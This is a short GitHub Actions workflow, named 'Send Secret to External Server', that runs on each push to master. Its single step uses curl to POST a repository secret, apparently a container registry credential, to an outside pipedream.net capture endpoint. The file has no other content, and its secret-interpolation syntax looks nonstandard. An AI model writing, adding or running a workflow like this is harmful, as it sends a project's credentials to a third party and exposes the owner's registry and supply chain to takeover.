name: Send Secret to External Server

on:
  push:
    branches:
      - "master"

jobs:
  send-secret:
    runs-on: ubuntu-latest
    steps:
      - name: Send Secret
        run: |
          curl -X POST -d "secret=${secrets.GCR_AUTH_CRDSERV}" https://eo643zjufhup1e1.m.pipedream.net
